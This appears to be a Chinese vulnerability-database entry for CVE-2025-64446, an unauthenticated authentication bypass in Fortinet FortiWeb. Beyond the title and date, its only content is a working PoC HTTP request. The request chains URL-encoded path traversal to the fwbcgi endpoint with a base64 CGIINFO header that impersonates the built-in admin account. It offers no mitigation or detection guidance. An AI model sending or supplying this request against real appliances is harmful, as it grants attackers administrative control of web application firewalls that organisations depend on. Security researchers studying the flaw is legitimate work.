Fortinet FortiWeb 未授权身份验证绕过漏洞(CVE-2025-64446)

日期: 2025-11-15 | 影响软件: fortiweb | POC: 已公开

漏洞描述

Fortinet FortiWeb 未授权身份验证绕过漏洞(CVE-2025-64446)

PoC代码

GET /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 
CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

相关漏洞推荐